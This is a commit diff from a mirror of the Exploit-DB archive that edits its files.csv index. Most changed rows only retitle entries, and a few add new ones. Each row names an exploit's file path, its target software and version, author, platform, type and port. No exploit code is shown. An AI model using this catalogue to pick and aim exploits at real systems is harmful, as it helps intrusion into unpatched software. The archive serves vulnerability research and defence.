bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-01-17

Browse source 
4 new exploits
This commit is contained in:
Offensive Security 2016-01-17 05:01:51 +00:00
parent 5abd225e44
commit 9e71d66c7f
10 changed files with 166 additions and 99 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

52
files.csv
View file

@ -345,7 +345,7 @@ id,file,description,date,author,platform,type,port
368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0
369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow Exploit",2004-08-01,"Serkan Akpolat",linux,local,0
370,platforms/linux/dos/370.c,"Citadel/UX Remote Denial of Service Exploit (PoC)",2004-08-02,CoKi,linux,dos,0
371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (c Version)",2004-08-02,N/A,linux,dos,0
371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (C)",2004-08-02,N/A,linux,dos,0
372,platforms/linux/remote/372.c,"OpenFTPD <= 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21
373,platforms/linux/remote/373.c,"OpenFTPD <= 0.30.1 (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21
374,platforms/linux/local/374.c,"SoX - (.wav) Local Buffer Overflow Exploiter",2004-08-04,Rave,linux,local,0
@ -520,7 +520,7 @@ id,file,description,date,author,platform,type,port
670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2) (c code)",2004-12-01,JohnH,windows,remote,143
671,platforms/windows/dos/671.c,"Neverwinter Nights special Fake Players Denial of Service Exploit",2004-12-01,"Luigi Auriemma",windows,dos,0
672,platforms/windows/dos/672.c,"Kreed <= 1.05 Format String and Denial of Service Exploit",2004-12-02,"Luigi Auriemma",windows,dos,0
673,platforms/php/webapps/673.cgi,"phpBB <= 2.0.10 - Remote Command Execution Exploit (cgi version)",2004-12-03,ZzagorR,php,webapps,0
673,platforms/php/webapps/673.cgi,"phpBB <= 2.0.10 - Remote Command Execution Exploit (CGI)",2004-12-03,ZzagorR,php,webapps,0
675,platforms/windows/remote/675.txt,"Hosting Controller <= 0.6.1 Hotfix 1.4 - Directory Browsing Vulnerability",2004-12-05,Mouse,windows,remote,0
676,platforms/php/webapps/676.c,"phpBB 1.0.0 & 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0
677,platforms/windows/dos/677.txt,"GetRight <= 5.2a - Skin File (.grs) Buffer Overflow Exploit",2004-12-06,ATmaCA,windows,dos,0
@ -549,7 +549,7 @@ id,file,description,date,author,platform,type,port
702,platforms/php/webapps/702.pl,"phpBB highlight Arbitrary File Upload (Santy.A)",2004-12-22,N/A,php,webapps,0
703,platforms/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions Exploit",2004-12-22,sysbug,php,webapps,0
704,platforms/php/webapps/704.pl,"e107 include() Remote Exploit",2004-12-22,sysbug,php,webapps,80
705,platforms/multiple/remote/705.pl,"Webmin BruteForce and Command Execution Exploit",2004-12-22,Di42lo,multiple,remote,10000
705,platforms/multiple/remote/705.pl,"Webmin - BruteForce and Command Execution Exploit",2004-12-22,Di42lo,multiple,remote,10000
711,platforms/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow Exploit",2005-04-24,cybertronic,windows,remote,21
712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Exploit",2004-12-23,pucik,linux,remote,8000
713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp Local Buffer Overflow Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0
@ -578,9 +578,9 @@ id,file,description,date,author,platform,type,port
745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000
746,platforms/multiple/remote/746.pl,"Webmin 1.5 - BruteForce + Command Execution",2005-01-08,ZzagorR,multiple,remote,10000
749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0
750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow (c Version)",2005-01-11,class101,windows,remote,6101
750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow (C)",2005-01-11,class101,windows,remote,6101
753,platforms/windows/remote/753.html,"Microsoft Internet Explorer .ANI Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0
754,platforms/php/webapps/754.pl,"ITA Forum <= 1.49 SQL Injection Exploit",2005-01-13,RusH,php,webapps,0
754,platforms/php/webapps/754.pl,"ITA Forum <= 1.49 - SQL Injection Exploit",2005-01-13,RusH,php,webapps,0
755,platforms/windows/dos/755.c,"Breed <= patch #1 - zero-length Remote Crash Exploit",2005-01-13,"Luigi Auriemma",windows,dos,7649
756,platforms/linux/local/756.c,"Exim <= 4.41 dns_build_reverse Local Exploit PoC",2005-01-15,"Rafael Carrasco",linux,local,0
758,platforms/osx/remote/758.c,"Apple iTunes Playlist Local Parsing Buffer Overflow Exploit",2005-01-16,nemo,osx,remote,0
@ -880,7 +880,7 @@ id,file,description,date,author,platform,type,port
1069,platforms/php/webapps/1069.php,"UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit",2005-06-25,mh_p0rtal,php,webapps,0
1070,platforms/asp/webapps/1070.pl,"ASPNuke <= 0.80 (article.asp) SQL Injection Exploit",2005-06-27,mh_p0rtal,asp,webapps,0
1071,platforms/asp/webapps/1071.pl,"ASPNuke <= 0.80 (comment_post.asp) SQL Injection Exploit",2005-06-27,"Alberto Trivero",asp,webapps,0
1072,platforms/multiple/dos/1072.cpp,"Stream / Raped - Denial of Service Attack (Windows Version)",2005-06-27,"Marco Del Percio",multiple,dos,0
1072,platforms/multiple/dos/1072.cpp,"Stream / Raped - Denial of Service Attack (Windows)",2005-06-27,"Marco Del Percio",multiple,dos,0
1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 ld.so Local Root Exploit (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103
@ -1502,7 +1502,7 @@ id,file,description,date,author,platform,type,port
1788,platforms/windows/remote/1788.pm,"PuTTy.exe <= 0.53 - (validation) Remote Buffer Overflow Exploit (meta)",2006-05-15,y0,windows,remote,0
1789,platforms/php/webapps/1789.txt,"TR Newsportal <= 0.36tr1 (poll.php) Remote File Inclusion Vulnerability",2006-05-15,Kacper,php,webapps,0
1790,platforms/php/webapps/1790.txt,"Squirrelcart <= 2.2.0 (cart_content.php) Remote Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication Bypass (Patch EXE)",2006-05-16,redsand,multiple,remote,5900
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication Bypass (Patched EXE)",2006-05-16,redsand,multiple,remote,5900
1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d - (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0
1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 - (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900
@ -1601,7 +1601,7 @@ id,file,description,date,author,platform,type,port
1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities",2006-06-08,"Federico Fazzi",php,webapps,0
1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems <= 1.1 (footer) Remote Include Vulnerability",2006-06-08,Kacper,php,webapps,0
1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0
1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise <= 2.0 - (ASP Version) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0
1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise <= 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0
1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0
1895,platforms/php/webapps/1895.txt,"empris <= r20020923 (phormationdir) Remote Include Vulnerability",2006-06-10,Kacper,php,webapps,0
1896,platforms/php/webapps/1896.txt,"aePartner <= 0.8.3 - (dir[data]) Remote Include Vulnerability",2006-06-10,Kacper,php,webapps,0
@ -1703,7 +1703,7 @@ id,file,description,date,author,platform,type,port
1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component <= 1.1.0 - Remote Include Vulnerability",2006-07-08,h4ntu,php,webapps,0
1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component <= 1.2.4RC3 - Remote Include Vulnerability",2006-07-08,h4ntu,php,webapps,0
1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO <= 2.2.4 (pluginpath) Remote File Include Vulnerability",2006-07-09,A.nosrati,php,webapps,0
1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit",2006-07-09,joffer,multiple,remote,10000
1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (PHP)",2006-07-09,joffer,multiple,remote,10000
1998,platforms/php/webapps/1998.pl,"Ottoman CMS <= 1.1.3 (default_path) Remote File Inclusion Exploit",2006-07-09,"Jacek Wlodarczyk",php,webapps,0
1999,platforms/windows/local/1999.pl,"Microsoft Word 2000/2003 Hlink Local Buffer Overflow Exploit PoC",2006-07-09,"SYS 49152",windows,local,0
2000,platforms/hardware/dos/2000.pl,"SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit PoC",2006-07-10,"Michael Thumann",hardware,dos,0
@ -1723,7 +1723,7 @@ id,file,description,date,author,platform,type,port
2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (perl)",2006-07-15,UmZ,multiple,remote,10000
2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (Perl)",2006-07-15,UmZ,multiple,remote,10000
2018,platforms/php/webapps/2018.txt,"FlushCMS <= 1.0.0-pre2 (class.rich.php) Remote Inclusion Vulnerability",2006-07-16,igi,php,webapps,0
2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod <= 1.2 (m2f_root_path) Remote Include Vulns",2006-07-17,OLiBekaS,php,webapps,0
2020,platforms/php/webapps/2020.txt,"com_videodb Mambo Component <= 0.3en Remote Include Vulnerability",2006-07-17,h4ntu,php,webapps,0
@ -1820,7 +1820,7 @@ id,file,description,date,author,platform,type,port
2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability",2006-08-07,SHiKaA,php,webapps,0
2122,platforms/php/webapps/2122.txt,"ME Download System <= 1.3 (header.php) Remote Inclusion Vulnerability",2006-08-07,"Philipp Niedziela",php,webapps,0
2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability",2006-08-07,SirDarckCat,php,webapps,0
2124,platforms/windows/dos/2124.php,"XChat <= 2.6.7 - (Windows Version) Remote Denial of Service Exploit (PHP)",2006-08-07,ratboy,windows,dos,0
2124,platforms/windows/dos/2124.php,"XChat <= 2.6.7 - (Windows) Remote Denial of Service Exploit (PHP)",2006-08-07,ratboy,windows,dos,0
2125,platforms/php/webapps/2125.txt,"Joomla JD-Wiki Component <= 1.0.2 - Remote Include Vulnerability",2006-08-07,jank0,php,webapps,0
2127,platforms/php/webapps/2127.txt,"Modernbill <= 1.6 (config.php) Remote File Include Vulnerability",2006-08-07,Solpot,php,webapps,0
2128,platforms/php/webapps/2128.txt,"SAPID CMS <= 1.2.3.05 (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0
@ -1842,7 +1842,7 @@ id,file,description,date,author,platform,type,port
2144,platforms/linux/local/2144.sh,"liblesstif <= 2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit",2006-08-08,"Karol Wiesek",linux,local,0
2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall <= 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0
2146,platforms/php/webapps/2146.txt,"docpile:we <= 0.2.2 (INIT_PATH) Remote File Inclusion Vulnerabilities",2006-08-08,"Mehmet Ince",php,webapps,0
2147,platforms/windows/dos/2147.pl,"XChat <= 2.6.7 - (Windows version) Remote Denial of Service Exploit (Perl)",2006-08-08,Elo,windows,dos,0
2147,platforms/windows/dos/2147.pl,"XChat <= 2.6.7 - (Windows) Remote Denial of Service Exploit (Perl)",2006-08-08,Elo,windows,dos,0
2148,platforms/php/webapps/2148.txt,"phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability",2006-08-08,Drago84,php,webapps,0
2149,platforms/php/webapps/2149.txt,"Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability",2006-08-08,Drago84,php,webapps,0
2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0
@ -2144,7 +2144,7 @@ id,file,description,date,author,platform,type,port
2448,platforms/windows/remote/2448.html,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Exploit (html)",2006-09-28,jamikazu,windows,remote,0
2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) <= 2.0 - (config.inc.php) File Include Vulnerability",2006-09-28,D_7J,php,webapps,0
2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability",2006-09-28,Kernel-32,php,webapps,0
2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability",2006-09-28,Kernel-32,php,webapps,0
2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 - (window.php) Remote File Include Vulnerability",2006-09-28,Kernel-32,php,webapps,0
2452,platforms/php/webapps/2452.txt,"phpSecurePages <= 0.28b (secure.php) Remote File Include Vulnerability",2006-09-28,D_7J,php,webapps,0
2453,platforms/php/webapps/2453.txt,"phpBB XS <= 0.58a (phpbb_root_path) Remote File Include Vulnerability",2006-09-28,"Mehmet Ince",php,webapps,0
2454,platforms/php/webapps/2454.txt,"PowerPortal 1.3a (index.php) Remote File Include Vulnerability",2006-09-29,v1per-haCker,php,webapps,0
@ -2155,7 +2155,7 @@ id,file,description,date,author,platform,type,port
2459,platforms/php/webapps/2459.txt,"Forum82 <= 2.5.2b - (repertorylevel) Multiple File Include Vulnerabilities",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0
2460,platforms/windows/remote/2460.c,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Exploit (c)",2006-09-29,LukeHack,windows,remote,0
2461,platforms/php/webapps/2461.txt,"VAMP Webmail <= 2.0beta1 (yesno.phtml) Remote Include Vulnerability",2006-09-30,Drago84,php,webapps,0
2462,platforms/php/webapps/2462.txt,"phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities",2006-09-30,"Mehmet Ince",php,webapps,0
2462,platforms/php/webapps/2462.txt,"phpMyWebmin <= 1.0 - (target) Remote File Include Vulnerabilities",2006-09-30,"Mehmet Ince",php,webapps,0
2463,platforms/osx/local/2463.c,"Mac OS X <= 10.4.7 Mach Exception Handling Local Root Exploit",2006-09-30,xmath,osx,local,0
2464,platforms/osx/local/2464.pl,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Exploit (10.3.x 0day)",2006-09-30,"Kevin Finisterre",osx,local,0
2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 (BSX_LIBDIR) Remote File Include Exploit",2006-10-01,Kacper,php,webapps,0
@ -3087,7 +3087,7 @@ id,file,description,date,author,platform,type,port
3419,platforms/windows/dos/3419.txt,"Microsoft Windows - (.doc) Malformed Pointers Denial of Service Exploit",2007-03-06,Marsu,windows,dos,0
3420,platforms/windows/remote/3420.html,"WinZip <= 10.0.7245 - FileView ActiveX Buffer Overflow Exploit (2)",2007-03-06,prdelka,windows,remote,0
3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 - SwDir.dll Internet Explorer Stack Overflow DoS",2007-03-07,shinnai,windows,dos,0
3422,platforms/windows/remote/3422.pl,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Perl Version)",2007-03-07,"Umesh Wanve",windows,remote,0
3422,platforms/windows/remote/3422.pl,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Perl)",2007-03-07,"Umesh Wanve",windows,remote,0
3423,platforms/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability",2007-03-07,GoLd_M,php,webapps,0
3424,platforms/multiple/local/3424.php,"PHP <= 5.2.1 substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0
3425,platforms/multiple/remote/3425.txt,"mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass Vulnerability",2007-03-07,"Stefan Esser",multiple,remote,0
@ -15329,7 +15329,7 @@ id,file,description,date,author,platform,type,port
17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0
17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection Vulnerability",2011-08-09,NoGe,php,webapps,0
17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0
17648,platforms/linux/remote/17648.sh,"HP Data Protector - Remote Root Shell (Linux Version)",2011-08-10,SZ,linux,remote,0
17648,platforms/linux/remote/17648.sh,"HP Data Protector - Remote Root Shell (Linux)",2011-08-10,SZ,linux,remote,0
17649,platforms/windows/remote/17649.py,"BisonFTP Server <= 3.5 - Remote Buffer Overflow Exploit",2011-08-10,localh0t,windows,remote,0
17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 mChannel use after free Vulnerability",2011-08-10,metasploit,windows,remote,0
17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0
@ -17271,9 +17271,9 @@ id,file,description,date,author,platform,type,port
19913,platforms/cgi/remote/19913.txt,"George Burgyan CGI Counter 4.0.2/4.0.7 Input Validation Vulnerability",2000-05-15,"Howard M. Kash III",cgi,remote,0
19914,platforms/windows/remote/19914.txt,"Seattle Lab Software Emurl 2.0 Email Account Access Vulnerability",2000-05-15,"Pierre Benoit",windows,remote,0
19915,platforms/linux/local/19915.txt,"KDE 1.1/1.1.1/1.2/2.0 kscd SHELL Environmental Variable Vulnerability",2000-05-16,Sebastian,linux,local,0
19916,platforms/multiple/remote/19916.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (1)",2000-05-16,"Hugo Breton",multiple,remote,0
19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (2)",2000-05-16,L0pht,multiple,remote,0
19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (3)",2000-05-16,L0pht,multiple,remote,0
19916,platforms/multiple/remote/19916.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability (1)",2000-05-16,"Hugo Breton",multiple,remote,0
19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability (2)",2000-05-16,L0pht,multiple,remote,0
19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability (3)",2000-05-16,L0pht,multiple,remote,0
19919,platforms/hardware/dos/19919.c,"Cisco 7xx Series Router - DoS Vulnerability",1999-03-11,Tiz.Telesup,hardware,dos,0
19920,platforms/multiple/dos/19920.c,"Computalynx CProxy Server 3.3 SP2 - Buffer Overflow DoS Vulnerability",2000-05-16,"HaCk-13 TeaM",multiple,dos,0
19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0
@ -18626,7 +18626,7 @@ id,file,description,date,author,platform,type,port
21345,platforms/unix/dos/21345.txt,"Qualcomm QPopper 4.0.x - Remote Denial of Service Vulnerability",2002-03-15,"Jonas Frey",unix,dos,0
21346,platforms/windows/dos/21346.html,"Microsoft Internet Explorer 5/6_Mozilla 0.8/0.9.x_Opera 5/6 JavaScript Interpreter Denial of Service Vulnerability",2002-03-19,"Patrik Birgersson",windows,dos,0
21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x Move_Uploaded_File Open_Basedir Circumvention Vulnerability",2002-03-17,Tozz,php,local,0
21348,platforms/linux/local/21348.txt,"Webmin 0.x Script Code Input Validation Vulnerability",2002-03-20,prophecy,linux,local,0
21348,platforms/linux/local/21348.txt,"Webmin 0.x - Script Code Input Validation Vulnerability",2002-03-20,prophecy,linux,local,0
21349,platforms/php/webapps/21349.txt,"PHP Nuke 5.x Error Message Web Root Disclosure Vulnerability",2002-03-21,godminus,php,webapps,0
21350,platforms/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability",2002-03-21,SPAX,windows,remote,0
21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 Weak Password Encryption Vulnerability",2002-03-22,c3rb3r,windows,local,0
@ -19124,7 +19124,7 @@ id,file,description,date,author,platform,type,port
21848,platforms/linux/local/21848.rb,"Linux udev - Netlink Local Privilege Escalation",2012-10-10,metasploit,linux,local,0
21849,platforms/unix/remote/21849.rb,"ZEN Load Balancer Filelog Command Execution",2012-10-10,metasploit,unix,remote,444
21850,platforms/linux/remote/21850.rb,"Samba SetInformationPolicy AuditEventsInfo Heap Overflow",2012-10-10,metasploit,linux,remote,0
21851,platforms/unix/remote/21851.rb,"Webmin /file/show.cgi Remote Command Execution",2012-10-10,metasploit,unix,remote,10000
21851,platforms/unix/remote/21851.rb,"Webmin 1.580 - /file/show.cgi Remote Command Execution",2012-10-10,metasploit,unix,remote,10000
21852,platforms/unix/remote/21852.rb,"QNX QCONN Remote Command Execution Vulnerability",2012-10-10,metasploit,unix,remote,0
21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 - DefaultServlet File Disclosure Vulnerability",2002-09-24,"Rossen Raykov",unix,remote,0
21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability",2002-09-24,"K.C. Wong",linux,dos,0
@ -19531,7 +19531,7 @@ id,file,description,date,author,platform,type,port
22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 Code Obfuscation Weakness",2002-02-22,"Simon Cozens",multiple,local,0
22273,platforms/linux/dos/22273.c,"Zlib 1.1.4 Compression Library gzprintf() Buffer Overrun Vulnerability (1)",2003-02-23,"Richard Kettlewel",linux,dos,0
22274,platforms/linux/remote/22274.c,"Zlib 1.1.4 Compression Library gzprintf() Buffer Overrun Vulnerability (2)",2003-02-23,CrZ,linux,remote,0
22275,platforms/linux/remote/22275.pl,"Webmin 0.9x_Usermin 0.9x/1.0 Session ID Spoofing Unauthenticated Access Vulnerability",2003-02-20,"Carl Livitt",linux,remote,0
22275,platforms/linux/remote/22275.pl,"Webmin 0.9x_Usermin 0.9x/1.0 - Session ID Spoofing Unauthenticated Access Vulnerability",2003-02-20,"Carl Livitt",linux,remote,0
22276,platforms/php/webapps/22276.txt,"Nuked-Klan 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2003-02-23,"gregory Le Bras",php,webapps,0
22277,platforms/php/webapps/22277.txt,"Nuked-Klan 1.3 - Remote Information Disclosure Vulnerability",2003-02-23,"gregory Le Bras",php,webapps,0
22278,platforms/linux/remote/22278.pl,"moxftp 2.2 Banner Parsing Buffer Overflow Vulnerability",2003-02-24,"Knud Erik Hojgaard",linux,remote,0
@ -20755,7 +20755,7 @@ id,file,description,date,author,platform,type,port
23532,platforms/windows/remote/23532.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb Directory Traversal Vulnerability",2004-01-09,badpack3t,windows,remote,0
23533,platforms/windows/remote/23533.txt,"Accipiter DirectServer 6.0 - Remote File Disclosure Vulnerability",2004-01-09,"Mark Bassett",windows,remote,0
23534,platforms/windows/dos/23534.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb CreateFile Function Denial of Service Vulnerability",2004-01-09,badpack3t,windows,dos,0
23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x Edit.CGI Remote Directory Traversal Vulnerability",2004-01-10,FIST,cgi,webapps,0
23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - Edit.CGI Remote Directory Traversal Vulnerability",2004-01-10,FIST,cgi,webapps,0
23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script Information Disclosure Vulnerability",2004-01-10,"Cabezon Aurelien",php,webapps,0
23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 Module.PHP Remote Command Execution Vulnerability",2004-01-10,"Zero X",php,webapps,0
23538,platforms/windows/dos/23538.txt,"LionMax Software WWW File Share Pro 2.4/2.6 - Remote Denial of Service Vulnerability",2004-01-12,dr_insane,windows,dos,0
@ -21734,7 +21734,7 @@ id,file,description,date,author,platform,type,port
24571,platforms/windows/remote/24571.html,"Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow Vulnerability",2004-09-03,celebrityhacker,windows,remote,0
24572,platforms/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 Notification Instance Name Remote Buffer Overflow Vulnerability",2004-09-03,anonymous,windows,remote,0
24573,platforms/multiple/webapps/24573.txt,"Keene Digital Media Server 1.0.2 - Cross-Site Scripting Vulnerabilities",2004-09-04,dr_insane,multiple,webapps,0
24574,platforms/cgi/webapps/24574.txt,"Webmin 1.x HTML Email Command Execution Vulnerability",2004-09-07,"Keigo Yamazaki",cgi,webapps,0
24574,platforms/cgi/webapps/24574.txt,"Webmin 1.x - HTML Email Command Execution Vulnerability",2004-09-07,"Keigo Yamazaki",cgi,webapps,0
24575,platforms/php/webapps/24575.txt,"PSNews 1.1 No Parameter Cross-Site Scripting Vulnerability",2004-09-05,"Michal Blaszczak",php,webapps,0
24576,platforms/cgi/webapps/24576.txt,"UtilMind Solutions Site News 1.1 - Authentication Bypass Vulnerability",2004-09-07,anonymous,cgi,webapps,0
24720,platforms/windows/remote/24720.txt,"Microsoft Internet Explorer 6.0 IFRAME Status Bar URI Obfuscation Weakness",2004-11-02,"Benjamin Tobias Franz",windows,remote,0
@ -35426,6 +35426,7 @@ id,file,description,date,author,platform,type,port
39171,platforms/php/webapps/39171.txt,"PHPIPAM 1.1.010 - Multiple Vulnerabilities",2016-01-05,"Mickael Dorigny",php,webapps,0
39172,platforms/php/webapps/39172.txt,"PrestaShop getSimilarManufacturer.php id_manufacturer Parameter SQL Injection",2014-05-05,indoushka,php,webapps,0
39173,platforms/php/webapps/39173.txt,"Caldera /costview2/jobs.php tr Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0
39174,platforms/php/webapps/39174.txt,"Caldera /costview2/printers.php tr Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0
39175,platforms/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,multiple,remote,0
39176,platforms/php/webapps/39176.html,"TOA Cross Site Request Forgery Vulnerability",2014-05-08,"High-Tech Bridge",php,webapps,0
39177,platforms/multiple/dos/39177.py,"VLC Media Player '.wav' File Memory Corruption Vulnerability",2014-05-09,"Aryan Bayaninejad",multiple,dos,0
@ -35486,7 +35487,10 @@ id,file,description,date,author,platform,type,port
39237,platforms/php/webapps/39237.txt,"WordPress NextGEN Gallery <= 1.9.1 'photocrati_ajax' Arbitrary File Upload Vulnerability",2014-05-19,SANTHO,php,webapps,0
